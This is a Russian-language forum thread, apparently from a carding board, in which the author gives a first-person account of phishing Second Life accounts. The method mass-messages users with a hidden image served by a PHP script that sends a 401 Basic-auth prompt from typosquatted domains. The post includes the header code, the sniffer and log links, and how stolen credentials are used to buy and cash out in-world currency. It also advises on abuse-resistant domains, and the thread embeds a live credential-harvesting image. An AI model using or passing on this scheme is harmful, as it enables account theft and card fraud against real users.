Визит в Second life

Aels

VIP member
Messages
318
Reputation
46
Reaction score
81
Points
28
Warn! Статья рассматривает довольно стерильный случай, который к тому же закончился неудачей.
Интерес представляет скорее не конкретный сайт, а методика поиска и мышления, в поиске игрового сайта, которым можно поживится.

Итак. есть сайт secondlife.com.
Цель сайта - создание функциональной альтернативной реальности (тоесть на нем собираются трансы, извращенцы, фури, и просто педики))
Главное что нас интересует - на нем есть возможность ебатцавывода заработаных денег.
Уже интересно.
Лезем в аккаунт, и паралельно в гогл.
Русское сообщество sl говорит что схема внесения денег следующая - прикрепляем сс или палку, и дальше перечисляем на акаунт инстантом (тоесть, фактически в кредит линденам). Хорошо.
А что с выводом? часа 4 гогла вывели на сайт
//dreamland.anshechung.com/index.php?fct=SELL_L$ Значит не все безнадежно.
Пробуем прицепить сс к акаунту (вот тут хоть убейте - ну не цепляется и все.) - хрен с ним, отложили. Будем иметь чужие аки.

Ищем что сайт при себе имеет. А имеет он свеженькую еву неизвестной модели (адская помесь жабы, форума, и их внутреннего месенжера) И в ней разрешен хтмл, притом почти весь ( режется только жс, ифрейм, стили).

Идем в раздел "личные сообщения", видим что в поле получателей можно вбивать несколько людей, и что все криво зааякшено. Фаербагом ловим форму:
Code:
Parameters:
body	<body><p><strong>yah!</strong></p></body>
doPost	Send Message
subject	test
[B]to	132075,44347[/B]
Source
Content-Type: application/x-www-form-urlencoded
Content-Length: 129
в поле to подставляются ни тухлые "имя фамилия", а вполне приятные айдишники, узнавать которые даже нет необходимости, притом пишутся они без заморочек - через запятую.
в одну строчку генерим первые 500шт на пробу (от 5к до 5500, чтобы нидайбог, не задеть админов)
тыкаем "сенд", и вуаля, пошешрав немного, сервер выдал "отправлено",
*тут подмечу, что всего айдишников я нашел 140к, несмотря на то что в википедии обещано лимон регистраций. И когда на скрипт мейлера я зарядил ряд в 2к номеров - сервер просто упал, и продолжал я уже на следующий день.
Чтобы не запариваться с фильтрацией реферера и юзерагента, да еще и не имея деда с пхп, сокетами\курлом, был накатан .js для оперы, котрый зам заполнял форму, сабмитил, убивал фрейм, создавал новый.
Разумеется, все прекрасно работало с моей машины, через проксю, и что примечательно, скушало всего мегабайт трафика, за всю рассылку.

Чем спамил то?

Есть такая бородатая фича. если у документа\файла\картинки отправить вместо нормального хедера
вот такой:
PHP:
header("WWW-Authenticate: Basic realm=\"".$message."\"");
header("HTTP/1.0 401 Unauthorized");
то выпрыгнет окошко с просьбой ввести логин и пароль.
Соответственно рассылаем наш php-снифф, кторый отдает 401й хедер.
Такаем его в лс просто как картинку.
Разрешенный хтмл давал лишь одну полезность - скрыть картинку атрибутом display:none.
Как обставлял, чтобы клюнули?
Да ничего хитрого... Красиво пишем заголовок "приватное сообщени", рядом картинка замочка, далее в рамочке текст
"сообщение приватное, авторизуйтесь пожалуйста, <тут пояснения для тупых, что ввести в поле логина (для нашего сайта авторизация по имени, фамилии и паролю), и если он по глупости нажал отмену - пусть нажмет Ф5>"
все максимально подробно. юзерам нравится забота)
В заголовке выскакивающего окна все нормальные браузеры пишут адрес сервера. для этой цели были регнуты secondllfe.com и secondlife-secure.com на данные хуиза вточности, а как оригинал, на них и закинул сниферы.
Чтобы окошко не долбило юзера после ввода логина и пароля - как только он что-то введет - выдаем ему фирменные кукисы).

Итак, с лс разобрались. Что делаем когда получили логин и пароль?
идем в кабинет юзера, покупаем линденов, перекиываем их себе на акк (а лучше не себе, а на соседний, куда прикрепим свою палку)
потом ползем в контору по ссылке выше, и подаем заявку на обнал.
Вот собственно и вся сястема)


Что было на самом деле:
Суток 5 я тупо ковырял сайт во все дырки, ничего полезного не выковырял, режется все к чертям.
В первый вечер спама я отправил 1+к личных сообщений, после чего уронил мессинг-сервер. с пришедших 14 акаунтов я перевел линдены на еще пару, и подал заякуна обналичивание.
Вобщем только их я обналичить и успел. вышло всего 120$, ну чтоже и так неплохо.
На следующий день. когда я проспамил отстаток, я всетаки задел пару админов, и на форуме поднялась волна говна и стонов. через полчаса после первой темы (через 10 минут после завершения рассылки) отключили лс, через 2 часа всем рефрешнули пароли.
Лс включили дня 3 назад (месяц ничего не работало), еще не смотрел что поменяли.
На этом история победного спамера закончилась, но несовсем)
у меня остались домены, а у форума осталась функция "уведомить о теме на имеил", а такимиже опциями ( бесконечно получателей, хтмл в теме), но письмо уже шло на имеил, а туда годился только тупой фейк-фишинг.


Подведу итоги:
  • Описаным методом можно тянуть акаунты почти везде, где можно вставить картинку с http:. Метод стар как мой дом, но еще работает, и надежно)
  • Расходы - 120р на 3 литра апельсинового сока, выпитого за это время, еще 500 на домены.
  • Доходы - 120$, говно, но могло быть и лучше.
  • Степень риска - потерять домены. Уменьшить степень риска - купить абузоустойчивые домены в 8 раз дороже, а учитывая, что контента никакого вообще нет(только запароленый скрипт), то абузить не на что.
  • Время - в общей сумме неделя. полезно потраченого (не на багопоиск) двое суток.
  • Мне почти не пригодились мои "хако-прогерские" знания, поскольку сервер по сути затронут не был, метод может использовать любой "новичек" (блин, боюсь этого слова))
Для примерного описания процента клюнувших, даю кусочек лога за 40 минут работы спамилки..
Code:
 //home.xml.in/elaevi_.html
(кликать на ip )

Копия снифака, бросал на скорую руку, но мб вам понравится, сорец одним файлом могу выкинуть, он крохотный, но умеет все что нужно.
Code:
//home.xml.in/?do=show
(ничего не тыркая, на клаве наберите 123 и нажмите ентер) любое другое обращение считается за посещение.

И собственно, вот рисунок, который вызвал всплывшее в при загрузке окошко:
Code:
 http://home.xml.in/?url=img.gif

Как видите, и тут работает, можно отбирать акаунты у школоты.

Простите за сумбурность оформления, я не копирайтер,
мелкое доение secondlife и ныне актуально, у кого получится скардить без холда - буду рад. Наверное у меня просто карма квадратная)
"А против крокодилов в канализации у нас свои методы"..


(с) Aels. хотя я сомневаюсь что эта статья представляет такую уж ценность.

зы. тоже хочу атм-ку, хотя негоже покупать бумажник, если класть нечего.
 
Last edited by a moderator:

mikola

DEER
Messages
29
Reputation
5
Reaction score
6
Points
3
Спасибо, +
Дай исходники снифера плиз
 

Devi

D.A.P
Messages
818
Reputation
188
Reaction score
250
Points
63
У меня одного на этой странице выскакивает херня ?
 

nuknuk0071

Professional
Messages
250
Reputation
22
Reaction score
28
Points
28
неа.. у меня просит авторизацию в опере, но я отменяю
лучше ничего не вводите
 

Aels

VIP member
Messages
318
Reputation
46
Reaction score
81
Points
28
И собственно, вот рисунок, который вызвал всплывшее в при загрузке окошко:
деви, нукнук, вы блин меня обижаете.
это не бага, это фича, наглядная демонстрация. вы статью что ли нихрена не читали?)

*могу убрать, но тогда не так эффектно.
 

nuknuk0071

Professional
Messages
250
Reputation
22
Reaction score
28
Points
28
сорри не хотел ничего плохого сказать, просто предупредил что во избежания недоразумений лучше ничего не вводить в выпадающее окошко

статью не читал, так как мало что понятно :) еще раз сорри
 

Aels

VIP member
Messages
318
Reputation
46
Reaction score
81
Points
28
да извиняться то не за что, просто в "этой выпрыгивающей уйне" нет ничего некашерного.
Писать туда можно хоть сочинение лермонтова, а посмотреть потом свою писанину по адресу в статейке)

Зы. Обнон редиска. вот че)
 
Last edited:
Top